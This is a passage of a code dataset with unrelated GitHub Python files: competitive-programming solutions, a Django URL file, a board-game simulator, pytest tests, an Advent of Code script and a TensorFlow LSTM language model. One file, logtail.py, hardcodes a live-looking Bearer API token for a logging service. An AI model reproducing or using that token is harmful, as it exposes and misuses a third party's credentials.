prefix + postfix\n\n\n print(rev_s, t)\n print(rev_t, s)\n if rev_s == t and rev_t == s:\n return True\n return False\n \"\"\"\n\n# --- TEST ---\na = Solution()\nb = a.isIsomorphic('paper', 'title')\nprint(b)\n\n# --- ALT SOLN by others ---\n","repo_name":"callmelazarus/leetcode-codewars-journey","sub_path":"ARRAYS n HASHING/isomorphic_string_e205.py","file_name":"isomorphic_string_e205.py","file_ext":"py","file_size_in_byte":2868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1243249700","text":"import bisect\r\nimport typing\r\n\r\n\r\nclass FenwickTree: # version not using dataclass for performance.\r\n def __init__(self, arr: typing.List[int]) -> None:\r\n n = len(arr)\r\n data = [0] * (n + 1)\r\n data[1:] = arr.copy()\r\n for i in range(n):\r\n j = i + (i & -i)\r\n if j > n:\r\n continue\r\n data[j] = max(data[j], data[i])\r\n self.__data = data\r\n\r\n def __len__(self) -> int:\r\n return len(self.__data) - 1\r\n\r\n def __setitem__(self, i: int, x: int) -> None:\r\n assert 0 <= i < len(self.__data) - 1\r\n i += 1\r\n while i < len(self.__data):\r\n self.__data[i] = max(self.__data[i], x)\r\n i += i & -i\r\n\r\n def __getitem__(self, i: int) -> int:\r\n assert 0 <= i < len(self.__data)\r\n v = 0\r\n while i > 0:\r\n v = max(v, self.__data[i])\r\n i -= i & -i\r\n return v\r\n\r\n\r\ndef main() -> None:\r\n n = int(input())\r\n p = list(map(int, input().split()))\r\n q = list(map(int, input().split()))\r\n divisor_indices = [[] for _ in range(n + 1)]\r\n for i, x in enumerate(p):\r\n for y in range(x, n + 1, x):\r\n divisor_indices[y].append(i + 1)\r\n # index = [0] * (n + 1)\r\n # dp = [[(0, -1)] * 2 for _ in range(n + 1)]\r\n # # (count, last index)\r\n # for i, x in enumerate(q):\r\n # # y = q[i]\r\n\r\n\r\n # print(divisor_indices)\r\n fw = FenwickTree([0] * (n + 1))\r\n # dp = [0] * (n + 1)\r\n for x in q:\r\n for last in divisor_indices[x][::-1]:\r\n # dp[last] = max(dp[last], dp[last - 1] + 1)\r\n fw[last] = fw[last] + 1\r\n # print(dp)\r\n # print(dp)\r\n print(fw[n + 1])\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/arc133/arc133_b/28688437.py","file_name":"28688437.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"4593319044","text":"from django.urls import path\nfrom .views import (BlogList,\n BlogDetail,\n CreateBlog,\n UpdateBlog,\n DeleteBlog,\n)\n\n\napp_name = 'blog'\n\n\nurlpatterns = [\n path('/delete/create/', DeleteBlog.as_view(), name='create'),\n path('', BlogList.as_view(), name='list'),\n path('create/', CreateBlog.as_view(), name='delete'),\n path('/update/', UpdateBlog.as_view(), name='update'),\n path('detail//', BlogDetail.as_view(), name='detail'),\n]\n\n","repo_name":"Tosin-JD/tosin_blog","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30752861571","text":"#!/usr/bin/python3\n\n\nfrom datetime import datetime, timezone\nimport json\nimport requests\nfrom requests.auth import HTTPBasicAuth\nfrom email.utils import parsedate_to_datetime\n\n\ndef logMessage(level, app, message):\n now = datetime.now() # current date and time\n\n date_time = now.strftime(\"%Y-%m-%d %H:%M:%S +0100\")\n\n# print (date_time)\n url = \"https://in.logtail.com/\"\n\n payload={\"dt\":date_time,\"level\":level,\"app\":app,\"message\":message}\n# print (payload)\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Bearer kiXyuTMDKGVA5axjd5qnc4R7'\n }\n\n response = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n\n# print (response)\n# data = json.loads(response.text)\n\n\nif __name__ == '__main__':\n\n logMessage(\"INFO\", \"logtail\", \"Testmessage\")\n","repo_name":"heron5/php_StyrelserummetApi","sub_path":"logtail.py","file_name":"logtail.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74718697152","text":"import itertools\nfrom copy import copy\nfrom quarto import SIZE, is_win, board_string, make_move\n\n# Description of pieces, a 4-dimensional binary space.\npiece_descriptions = {}\nfor a, size in enumerate(['short', 'tall']):\n for b, color in enumerate(['dark', 'light']):\n for c, shape in enumerate(['round', 'square']):\n for d, density in enumerate(['hollow', 'solid']):\n piece = (bool(a), bool(b), bool(c), bool(d))\n piece_descriptions[piece] = (size, color, shape, density)\n\ndef game(player_a, player_b):\n \"\"\"\n Play a game between two player functions.\n \"\"\"\n pieces = list(piece_descriptions.keys())\n\n # Board mapping positions to pieces currently occupying that position.\n board = {}\n for x in range(SIZE):\n for y in range(SIZE):\n board[(x, y)] = None\n\n current_piece = None\n for score, current_player in itertools.cycle([(+1, player_a), (-1, player_b)]):\n # Remove the current piece from available pieces, and give it to the current player.\n if current_piece:\n pieces.remove(current_piece)\n # Current player places the piece at `pos`, and chooses a piece for the opponent.\n pos, next_piece = current_player(copy(board), copy(pieces), current_piece)\n #print('player moved at %s, and chose %s' % (pos, next_piece))\n if pos:\n assert board[pos] is None # Don't allow playing on occupied positions.\n board = make_move(board, current_piece, pos)\n current_piece = next_piece\n\n #print(board_string(board))\n\n if is_win(board):\n #print('%s wins!' % current_player.__name__)\n return score\n\n if not pieces:\n # Game over, draw.\n #print('draw')\n return 0\n\ndef match(player_a, player_b, num_games, verbose=False):\n a_score = 0\n b_score = 0\n ties = 0\n for i in range(num_games):\n if i % 2 == 0:\n result = game(player_a, player_b)\n else:\n result = -game(player_b, player_a)\n\n if result == +1:\n a_score += 1\n elif result == -1:\n b_score += 1\n elif result == 0:\n ties += 1\n\n if verbose:\n print(player_a.__name__, a_score)\n print(player_b.__name__, b_score)\n print('ties', ties)\n\n return (a_score, b_score, ties)\n\nif __name__ == '__main__':\n from players import bot_random, bot_oneply, bot_twoply, bot_wholeply\n #a, b, t = match(bot_random, bot_oneply, 100, verbose=True)\n #a, b, t = match(bot_twoply, bot_oneply, 100, verbose=True)\n a, b, t = match(bot_twoply, bot_wholeply, 100, verbose=True)\n","repo_name":"christian-oudard/quarto","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"15970676740","text":"import os\nimport pickle\n\nfrom sentiment_analysis.exception import CustomException\n\n\ndef save_object(file_path, object):\n \"\"\"function to save an object in input into a pkl file\"\"\"\n try:\n dir_path = os.path.dirname(file_path)\n\n os.makedirs(dir_path, exist_ok=True)\n\n with open(file_path, \"wb\") as f:\n pickle.dump(object, f)\n\n except Exception as e:\n raise CustomException(e)\n","repo_name":"RedhaWassim/Sentiment-Analysis","sub_path":"sentiment_analysis/machine_learning/utils/saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"60"} +{"seq_id":"13257757936","text":"import pytest\n\nfrom worker import Worker\nfrom enums import WorkerState, FactoryItem\n\n\ndef test_initialising_worker():\n worker = Worker()\n\n assert worker.current_state == WorkerState.LOOKING_FOR_PARTS\n assert worker.inventory == set()\n\n\n@pytest.mark.parametrize(\n \"part\",\n [FactoryItem.COMPONENT_A, FactoryItem.COMPONENT_B],\n)\ndef test_pick_up_part(part):\n worker = Worker()\n assert len(worker.inventory) == 0\n\n worker.pick_up_part(part)\n assert len(worker.inventory) == 1\n\n\ndef test_pick_up_part_both_parts_inventory():\n worker = Worker()\n\n assert not worker.pick_up_part(FactoryItem.COMPONENT_A)\n assert worker.time_until_completion == 0\n assert worker.new_state is None\n\n assert worker.pick_up_part(FactoryItem.COMPONENT_B)\n assert worker.time_until_completion == 3\n assert worker.new_state == WorkerState.ASSEMBLING\n\n\n@pytest.mark.parametrize(\n \"timer, expected\",\n [(3, False), (2, False), (1, True)],\n)\ndef test_continue_assembling(timer, expected):\n worker = Worker()\n worker.current_state = WorkerState.ASSEMBLING\n worker.time_until_completion = timer\n\n assert worker.continue_assembling() == expected\n\n\ndef test_drop_completed_item():\n worker = Worker()\n worker.current_state = WorkerState.WAITING_TO_DROP_ITEM\n worker.inventory = {FactoryItem.FINISHED_PRODUCT}\n\n assert worker.drop_completed_item()\n assert len(worker.inventory) == 0\n assert worker.new_state == WorkerState.LOOKING_FOR_PARTS\n\n\n@pytest.mark.parametrize(\n \"inventory, part, expected\",\n [\n (\n {FactoryItem.COMPONENT_A, FactoryItem.COMPONENT_B},\n FactoryItem.COMPONENT_A,\n False,\n ),\n (\n {FactoryItem.COMPONENT_A},\n FactoryItem.COMPONENT_A,\n False,\n ),\n (\n {FactoryItem.COMPONENT_B},\n FactoryItem.COMPONENT_A,\n True,\n ),\n (\n set(),\n FactoryItem.COMPONENT_B,\n True,\n ),\n ],\n)\ndef test_is_part_desired_by_worker(inventory, part, expected):\n worker = Worker()\n worker.inventory = inventory\n\n assert worker.is_part_desired_by_worker(part) == expected\n\n\n@pytest.mark.parametrize(\n \"current_state, new_state\",\n [\n (WorkerState.LOOKING_FOR_PARTS, WorkerState.ASSEMBLING),\n (WorkerState.ASSEMBLING, WorkerState.WAITING_TO_DROP_ITEM),\n (WorkerState.WAITING_TO_DROP_ITEM, WorkerState.LOOKING_FOR_PARTS),\n (\n WorkerState.LOOKING_FOR_PARTS,\n WorkerState.LOOKING_FOR_PARTS,\n ), # currently accepted even though this state change should not happen\n (\n WorkerState.LOOKING_FOR_PARTS,\n WorkerState.WAITING_TO_DROP_ITEM,\n ), # currently accepted even though this state change should not happen\n (\n WorkerState.ASSEMBLING,\n WorkerState.WAITING_TO_DROP_ITEM,\n ), # currently accepted even though this state change should not happen\n ],\n)\ndef test_set_new_state(current_state, new_state):\n worker = Worker()\n worker.current_state = current_state\n worker.new_state = new_state\n\n worker.set_new_state()\n assert worker.current_state == new_state\n assert worker.new_state is None\n","repo_name":"JanAdamiak/Yagro_assessment","sub_path":"tests/test_worker.py","file_name":"test_worker.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41206605149","text":"cost = 0\r\nfree = 0\r\npartly = 990\r\nfull = 1390\r\nage_list = []\r\ntickets = (int(input('Введите количество билетов, которое хотите приобрести\\n')))\r\nfor i in range(1, tickets+1):\r\n age = int(input(f'Билет {i}. Введите возраст: \\n'))\r\n age_list.append(age)\r\n if age < 18:\r\n cost += free\r\n elif 18 <= age <= 25:\r\n cost += partly\r\n else:\r\n cost += full\r\n\r\nif tickets > 3:\r\n discount_cost = int(cost * 0.9)\r\n print('Стоимость билетов со скидкой: ', discount_cost, 'рублей')\r\nelse:\r\n print(\"Стоимость билетов составляет: \", cost, \"рублей\")\r\n","repo_name":"Sonne-commit/Sonne","sub_path":"18.8.19 Домашняя работа.py","file_name":"18.8.19 Домашняя работа.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"72364650432","text":"# coding=utf-8\nimport json\nimport os\nimport re\n\n\ndef combine_path(base, *path1):\n r = base\n for p in path1:\n r = os.path.join(r, *re.split(r'[/\\\\]', p))\n return r\n\n\nif __name__ == '__main__':\n remote = r'\\\\192.168.1.8'\n f = r'\\\\192.168.1.8\\corpus\\project\\matong\\tts_test\\summary_info.txt'\n d = {}\n with open(f, 'r', encoding='utf-8') as rf:\n lines = rf.readlines()\n for line in lines:\n es = line.split('\\t')\n d[es[0]] = d.get(es[0]) or []\n name = os.path.basename(es[1].strip()).replace('.wav', '')\n tmp = {'aid': name, 'content': es[0], 'source': combine_path(remote, es[1].strip())}\n d[es[0]].append(tmp.__str__())\n with open('tmp.json', 'w+', encoding='utf-8') as wf:\n json.dump(d, wf, indent=4, ensure_ascii=False)\n","repo_name":"leiax00/AutoSpeechTest","sub_path":"scripts/tts_for_autoTest.py","file_name":"tts_for_autoTest.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"25481943924","text":"import random\nbossRaw = [i.strip().split() for i in open(\"Advent of Code/Day 22/boss.txt\").readlines()]\nboss, player = {\"H\":int(bossRaw[0][1]), \"D\":int(bossRaw[1][1]), \"E\":[]}, {\"H\":50, \"M\":500, \"A\": 0, \"E\":[], \"T\":0}\n\ndef magic_missile(boss, player):\n player[\"M\"] -= 53\n boss[\"H\"] -= 4\n return boss, player\n\ndef drain(boss, player):\n player[\"M\"] -= 73\n player[\"T\"] += 73\n player[\"H\"] += 2\n boss[\"H\"] -= 2\n return boss, player\n\ndef shield(player):\n player[\"M\"] -= 113\n player[\"T\"] += 113\n player[\"E\"].append({\"T\": 6, \"N\":\"S\"})\n return player\n\ndef poison(boss, player):\n player[\"M\"] -= 173\n player[\"T\"] += 173\n boss[\"E\"].append({\"T\":6, \"N\":\"P\"})\n return boss, player\n\ndef recharge(player):\n player[\"M\"] -= 229\n player[\"T\"] += 229\n player[\"E\"].append({\"T\":5, \"N\":\"R\"})\n return player\n\ndef effects(char):\n for i in char[\"E\"]:\n i[\"T\"] -= 1\n if i[\"N\"] == \"S\": char[\"A\"] = 0 if i[\"T\"] == 0 else 7\n elif i[\"N\"] == \"P\": char[\"H\"] -= 3\n elif i[\"N\"] == \"R\": char[\"M\"] += 101\n if i[\"T\"] == 0: char[\"E\"].remove({\"N\":i[\"N\"], \"T\":0})\n return char\n\ndef validCast(spell, boss, player):\n if spell == \"M\" and player[\"M\"] < 53: return False\n elif spell == \"D\" and player[\"M\"] < 73: return False\n elif spell == \"S\" and player[\"M\"] < 113: return False\n elif spell == \"S\" and player[\"M\"] < 173 and True in [i[\"N\"] == \"S\" for i in player[\"E\"]]: return False\n elif spell == \"P\" and player[\"M\"] < 173 and True in [i[\"N\"] == \"P\" for i in boss[\"E\"]]: return False\n elif spell == \"R\" and player[\"M\"] < 229 and True in [i[\"N\"] == \"R\" for i in player[\"E\"]]: return False\n return True\n\ndef fight(boss, player, rSeed):\n random.seed(rSeed)\n spells, pTurn = [\"M\", \"D\", \"S\", \"P\", \"R\"], False\n while player[\"H\"] > 0 and boss[\"H\"] > 0:\n if pTurn:\n player[\"H\"] -= max(boss[\"D\"] - player[\"A\"], 1)\n else:\n if player[\"M\"] >= 53: return False\n vCast = False\n while not vCast:\n cast = random.choice(spells)\n vCast = validCast(cast, boss, player)\n if cast == \"M\": boss, player = magic_missile(boss, player)\n elif cast == \"D\": boss, player = drain(boss, player)\n elif cast == \"S\": player = shield(player)\n elif cast == \"P\": boss, player = poison(boss, player)\n elif cast == \"R\": player = recharge(player)\n boss, player = effects(boss), effects(player)\n pTurn = not pTurn\n return pTurn, player[\"T\"]\n\nfor i in range(1000000):\n if fight(boss, player, i):\n print(i)\n break\n","repo_name":"tkern0/misc","sub_path":"Advent of Code/Day 22/advent.py","file_name":"advent.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"25486923030","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import CudnnLSTM\nfrom tensorflow.contrib.cudnn_rnn.python.ops.cudnn_rnn_ops import RNNParamsSaveable\nfrom tensorflow.contrib.legacy_seq2seq.python.ops.seq2seq import sequence_loss_by_example\n\nimport time\nimport sys\nsys.stdout = sys.stderr\nimport tensorflow as tf\nimport numpy as np\n#from tensorflow.models.rnn.ptb import reader\nimport reader\n\nflags = tf.flags\nlogging = tf.logging\n\nflags.DEFINE_string(\n \"model\", \"small\",\n \"A type of model. Possible options are: small, medium, large.\")\nflags.DEFINE_bool(\"use_fp16\", False, \"Train using 16-bit floats instead of 32bit floats\")\nflags.DEFINE_bool('debug', False, 'More debug info in Tensorboard')\nflags.DEFINE_string('cost_function', 'default', 'Which cost function to use')\nflags.DEFINE_string('optimizer', 'GradientDescentOptimizer', 'Which optimizer to use')\nflags.DEFINE_bool('non_rnn_in_fp32', True, 'Perform non-rnn layers in fp32')\nflags.DEFINE_string(\"data_path\", None, \"Where the training/test data is stored.\")\nflags.DEFINE_string(\"save_path\", None, \"Model output directory.\")\nflags.DEFINE_float(\"reg_term\", 0.0, \"L2 regularization of parameters\")\nflags.DEFINE_float(\"init_scale\", 0.0, \"initialization for weights will be [-init_scale, init_scale]\")\nflags.DEFINE_float(\"initial_lr\", 0.0, \"learning rate for 0 epoch\")\nflags.DEFINE_integer(\"max_valid_increases\", 1, \"max number of times validation error can go up before action is taken\")\nflags.DEFINE_integer(\"gseed\", 1, \"graph level random seed\")\n\nFLAGS = flags.FLAGS\nprint('Model is: %s' % FLAGS.model)\nprint('use_fp16 is: %s' % FLAGS.use_fp16)\nprint('cost function is: %s' % FLAGS.cost_function)\nprint('optimizer is: %s' % FLAGS.optimizer)\nprint('do non rnn layers in fp32: %s' % FLAGS.non_rnn_in_fp32)\nprint('output debug info: %s' % FLAGS.debug)\nprint('l2 regularizer weight: %s' % FLAGS.reg_term)\nprint('weight initializer init_scale: %s' % (FLAGS.init_scale if FLAGS.init_scale else 'will use model default'))\nprint('initial learning rate: %s' % FLAGS.initial_lr)\nprint('Gseed: %s' % FLAGS.gseed)\n\n\ndef data_type(is_lstm_layer=False):\n if not is_lstm_layer and FLAGS.non_rnn_in_fp32:\n return tf.float32\n else:\n return tf.float16 if FLAGS.use_fp16 else tf.float32\n\ndef variable_summaries(var, name):\n \"\"\"Attach a lot of summaries to a Tensor.\n This is also quite expensive.\n \"\"\"\n with tf.name_scope('summaries'):\n s_var = tf.cast(var, tf.float32)\n amean = tf.reduce_mean(tf.abs(s_var))\n tf.summary.scalar('amean/' + name, amean)\n mean = tf.reduce_mean(s_var)\n tf.summary.scalar('mean/' + name, mean)\n with tf.name_scope('stddev'):\n stddev = tf.sqrt(tf.reduce_sum(tf.square(s_var - mean)))\n tf.summary.scalar('sttdev/' + name, stddev)\n tf.summary.scalar('max/' + name, tf.reduce_max(s_var))\n tf.summary.scalar('min/' + name, tf.reduce_min(s_var))\n tf.summary.histogram(name, var)\n\n\nclass PTBModel(object):\n \"\"\"The PTB model.\"\"\"\n\n def __init__(self, is_training, config, debug=False):\n self.batch_size = batch_size = config.batch_size\n self.num_steps = num_steps = config.num_steps\n self.size = size = config.hidden_size\n vocab_size = config.vocab_size\n self.num_layers = config.num_layers\n\n self._input_data = tf.placeholder(tf.int32, [batch_size, num_steps])\n self._targets = tf.placeholder(tf.int32, [batch_size, num_steps])\n\n embedding = tf.get_variable(\"embedding\", [vocab_size, size], dtype=data_type(is_lstm_layer=False))\n inputs = tf.nn.embedding_lookup(embedding, self._input_data, name=\"inputs_to_rnn\")\n if debug:\n variable_summaries(inputs, \"inputs_to_rnn\")\n\n if is_training and config.keep_prob < 1:\n inputs = tf.nn.dropout(inputs, config.keep_prob)\n\n rnn = CudnnLSTM(config.num_layers, size, size, input_mode='linear_input', direction='unidirectional',\n dropout=config.keep_prob, seed=0, seed2=0)\n params_size_t = rnn.params_size()\n self._initial_input_h = tf.placeholder(data_type(is_lstm_layer=True), shape=[config.num_layers, batch_size, size]) #self._initial_input_h = tf.Variable(tf.zeros([config.num_layers, batch_size, size]))\n self._initial_input_c = tf.placeholder(data_type(is_lstm_layer=True), shape=[config.num_layers, batch_size, size]) #self._initial_input_c = tf.Variable(tf.zeros([config.num_layers, batch_size, size]))\n #self.params = tf.get_variable(\"params\", [params_size_t], validate_shape=False, dtype=data_type(is_lstm_layer=False))\n self.params = tf.Variable(tf.random_uniform([params_size_t], minval=-config.init_scale, maxval=config.init_scale, dtype=data_type(is_lstm_layer=True)), validate_shape=False)\n self.params_size_t = rnn.params_size()\n\n outputs, output_h, output_c = rnn(is_training=is_training, input_data=tf.transpose(tf.cast(inputs, dtype=data_type(is_lstm_layer=True)), [1, 0, 2]), input_h=self.input_h,\n input_c=self.input_c, params=self.params)\n\n self._output_h = output_h\n self._output_c = output_c\n\n output = tf.reshape(tf.concat(values=tf.transpose(outputs, [1, 0, 2]), axis=1), [-1, size])\n\n if debug:\n variable_summaries(output, 'multiRNN_output')\n\n softmax_w = tf.get_variable(\"softmax_w\", [size, vocab_size], dtype=data_type(is_lstm_layer=False))\n softmax_b = tf.get_variable(\"softmax_b\", [vocab_size], dtype=data_type(is_lstm_layer=False))\n logits = tf.matmul(output if output.dtype == data_type(is_lstm_layer=False) else tf.cast(output, data_type(is_lstm_layer=False)), softmax_w) + softmax_b\n\n if debug:\n variable_summaries(logits, 'logits')\n\n #loss = tf.contrib.nn.seq2seq.sequence_loss_by_example(\n loss = sequence_loss_by_example( \n [logits],\n [tf.reshape(self._targets, [-1])],\n [tf.ones([batch_size * num_steps], dtype=data_type(is_lstm_layer=False))])\n\n self._cost = cost = tf.reduce_sum(loss) / batch_size\n if FLAGS.cost_function == 'avg':\n self._cost_to_optimize = cost_to_optimize = tf.reduce_mean(loss)\n else:\n self._cost_to_optimize = cost_to_optimize = cost\n\n tvars = tf.trainable_variables()\n for v in tvars:\n cost_to_optimize += FLAGS.reg_term * tf.cast(tf.nn.l2_loss(v), dtype=data_type(False)) / (batch_size*config.num_steps)\n self._cost_to_optimize = cost_to_optimize\n\n if debug:\n tf.summary.scalar('cost no regularization', cost)\n tf.summary.scalar('cost_to_optimize', cost_to_optimize)\n\n #self._final_state = state\n\n if not is_training:\n self.merged = tf.summary.merge_all()\n return\n\n self._lr = tf.Variable(0.0, trainable=False, dtype=data_type(is_lstm_layer=False))\n #if debug:\n # tf.scalar_summary('learning rate', self._lr)\n\n #tvars = tf.trainable_variables()\n type2vars = dict()\n print(\"**************************\")\n print(\"Trainable Variables\")\n print(\"**************************\")\n for var in tvars:\n print('Variable name: %s. With dtype: %s and shape: %s' % (var.name, var.dtype, var.get_shape()))\n if var.dtype not in type2vars:\n type2vars[var.dtype] = [var]\n else:\n type2vars[var.dtype].append(var)\n\n print(\"**************************\")\n print(\"Gradients Variables\")\n print(\"**************************\")\n _grads = tf.gradients(cost_to_optimize, tvars)\n type2grads = dict()\n for g in _grads:\n print('Gradient name: %s. With dtype: %s' % (g.name, g.dtype))\n if g.dtype not in type2grads:\n type2grads[g.dtype] = [g]\n else:\n type2grads[g.dtype].append(g)\n\n type2clippedGrads = dict()\n for dtype in type2grads:\n cgrads, _ = tf.clip_by_global_norm(type2grads[dtype], config.max_grad_norm)\n type2clippedGrads[dtype] = cgrads\n\n\n if debug:\n for (gkey, vkey) in zip(type2clippedGrads.keys(),type2vars.keys()):\n for (clipped_gradient, variable) in zip(type2clippedGrads[gkey], type2vars[vkey]):\n variable_summaries(clipped_gradient, \"clipped_dcost/d\"+variable.name)\n variable_summaries(variable, variable.name)\n\n\n if FLAGS.optimizer == 'MomentumOptimizer':\n optimizer = tf.train.MomentumOptimizer(learning_rate=self._lr, momentum=0.9)\n elif FLAGS.optimizer == 'AdamOptimizer':\n optimizer = tf.train.AdamOptimizer()\n elif FLAGS.optimizer == 'RMSPropOptimizer':\n optimizer = tf.train.RMSPropOptimizer(learning_rate=self._lr)\n elif FLAGS.optimizer == 'AdagradOptimizer':\n optimizer = tf.train.AdagradOptimizer(learning_rate=self._lr)\n else:\n optimizer = tf.train.GradientDescentOptimizer(self._lr)\n\n allgrads = []\n allvars = []\n for dtype in type2clippedGrads:\n allgrads += type2clippedGrads[dtype]\n\n #WARNING: key order assumption\n for dtype in type2vars:\n allvars += type2vars[dtype]\n\n self._train_op = optimizer.apply_gradients(zip(allgrads, allvars))\n\n self._new_lr = tf.placeholder(dtype=data_type(False), shape=[], name=\"new_learning_rate\")\n self._lr_update = tf.assign(self._lr, self._new_lr)\n self.merged = tf.summary.merge_all()\n\n def assign_lr(self, session, lr_value):\n session.run(self._lr_update, feed_dict={self._new_lr: lr_value})\n\n @property\n def input_data(self):\n return self._input_data\n\n @property\n def targets(self):\n return self._targets\n\n @property\n def initial_state(self):\n return self._initial_state\n\n @property\n def input_h(self):\n return self._initial_input_h\n\n @property\n def input_c(self):\n return self._initial_input_c\n\n @property\n def output_h(self):\n return self._output_h\n\n @property\n def output_c(self):\n return self._output_c\n\n @property\n def input(self):\n return self._input\n\n @property\n def cost(self):\n return self._cost\n\n @property\n def lr(self):\n return self._lr\n\n @property\n def train_op(self):\n return self._train_op\n\n\nclass SmallConfig(object):\n \"\"\"Small config.\"\"\"\n init_scale = 0.1\n learning_rate = 1.0\n max_grad_norm = 5\n num_layers = 2\n num_steps = 20\n hidden_size = 200\n max_epoch = 4\n max_max_epoch = 13\n keep_prob = 1.0\n lr_decay = 0.5\n batch_size = 20\n vocab_size = 10000\n\n\nclass MediumConfig(object):\n \"\"\"Medium config.\"\"\"\n init_scale = 0.05\n learning_rate = 1.0\n max_grad_norm = 5\n num_layers = 2\n num_steps = 35\n hidden_size = 650\n max_epoch = 6\n max_max_epoch = 39\n keep_prob = 0.5\n lr_decay = 0.8\n batch_size = 20\n vocab_size = 10000\n\n\nclass LargeConfig(object):\n \"\"\"Large config.\"\"\"\n #init_scale = 0.04\n init_scale = 0.004\n learning_rate = 1.0\n max_grad_norm = 10\n num_layers = 2\n num_steps = 35\n hidden_size = 1500\n max_epoch = 14\n max_max_epoch = 55\n keep_prob = 0.35\n lr_decay = 1 / 1.15\n batch_size = 20\n vocab_size = 10000\n\n\nclass XLargeConfig(object):\n \"\"\"Large config.\"\"\"\n init_scale = 0.04\n learning_rate = 1.0\n max_grad_norm = 10\n num_layers = 3\n num_steps = 35\n hidden_size = 1500\n max_epoch = 14\n max_max_epoch = 55\n keep_prob = 0.35\n lr_decay = 1 / 1.15\n batch_size = 20\n vocab_size = 10000\n\n\nclass XXLargeConfig(object):\n \"\"\"Large config.\"\"\"\n init_scale = 0.04\n learning_rate = 1.0\n max_grad_norm = 10\n num_layers = 4\n num_steps = 35\n hidden_size = 1500\n max_epoch = 14\n max_max_epoch = 55\n keep_prob = 0.35\n lr_decay = 1 / 1.15\n batch_size = 20\n vocab_size = 10000\n\n\ndef run_epoch(session, model, data, eval_op=None, verbose=False, epoch_ind=0):\n \"\"\"Runs the model on the given data.\"\"\"\n start_time = time.time()\n epoch_size = ((len(data) // model.batch_size) - 1) // model.num_steps\n costs = 0.0\n iters = 0\n if eval_op is not None:\n fetches = [model.cost, model.output_h, model.output_c, eval_op]\n else:\n fetches = [model.cost, model.output_h, model.output_c]\n\n h = np.zeros(shape=(model.num_layers, model.batch_size, model.size), dtype=np.float32)\n c = np.zeros(shape=(model.num_layers, model.batch_size, model.size), dtype=np.float32)\n\n for step, (x, y) in enumerate(reader.ptb_iterator(data, model.batch_size, model.num_steps)):\n\n feed_dict = {}\n feed_dict[model.input_data] = x\n feed_dict[model.targets] = y\n feed_dict[model.input_c] = c\n feed_dict[model.input_h] = h\n\n if eval_op is not None:\n cost, h, c, _ = session.run(fetches, feed_dict)\n else:\n cost, h, c = session.run(fetches, feed_dict)\n\n costs += cost\n iters += model.num_steps\n\n if verbose and step % (epoch_size // 10) == 10:\n print(\"%.3f perplexity: %.3f speed: %.0f wps\" %\n (step * 1.0 / epoch_size, np.exp(costs / iters),\n iters * model.batch_size / (time.time() - start_time)))\n\n print(\"TOTAL EPOCH TIME: %.3f seconds\" % (time.time() - start_time))\n return np.exp(costs / iters)\n\n\ndef get_config():\n if FLAGS.model == \"small\":\n return SmallConfig()\n elif FLAGS.model == \"medium\":\n return MediumConfig()\n elif FLAGS.model == \"large\":\n return LargeConfig()\n elif FLAGS.model == \"xlarge\":\n return XLargeConfig()\n elif FLAGS.model == \"xxlarge\":\n return XXLargeConfig()\n else:\n raise ValueError(\"Invalid model: %s\", FLAGS.model)\n\n\ndef main(_):\n if not FLAGS.data_path:\n raise ValueError(\"Must set --data_path to PTB data directory\")\n\n raw_data = reader.ptb_raw_data(FLAGS.data_path)\n train_data, valid_data, test_data, _ = raw_data\n\n config = get_config()\n eval_config = get_config()\n eval_config.batch_size = 1\n eval_config.num_steps = 1\n\n with tf.Graph().as_default():\n tf.set_random_seed(FLAGS.gseed)\n if FLAGS.init_scale != 0.0:\n initializer = tf.random_uniform_initializer(-1*FLAGS.init_scale,\n FLAGS.init_scale)\n else:\n initializer = tf.random_uniform_initializer(-config.init_scale,\n config.init_scale)\n with tf.name_scope(\"Train\"):\n with tf.variable_scope(\"Model\", reuse=None, initializer=initializer):\n m = PTBModel(is_training=True, config=config, debug=FLAGS.debug)\n tf.summary.scalar(\"Learning Rate\", m.lr)\n\n with tf.name_scope(\"Valid\"):\n with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n mvalid = PTBModel(is_training=False, config=config)\n\n #with tf.name_scope(\"Test\"):\n # with tf.variable_scope(\"Model\", reuse=True, initializer=initializer):\n # mtest = PTBModel(is_training=False, config=eval_config)\n\n per_epoch_train_loss_update = tf.placeholder(tf.float32, shape=[])\n per_epoch_train_loss = tf.Variable(float(\"inf\"), dtype=tf.float32, trainable=False, name='Epoch_train_loss', validate_shape=False)\n tf.summary.scalar(\"Training Perplexity\", per_epoch_train_loss)\n per_epoch_train_loss_update_op = tf.assign(per_epoch_train_loss, per_epoch_train_loss_update)\n\n per_epoch_valid_loss_update = tf.placeholder(tf.float32, shape=[])\n per_epoch_valid_loss = tf.Variable(float(\"inf\"), dtype=tf.float32, trainable=False, name='Epoch_train_loss', validate_shape=False)\n 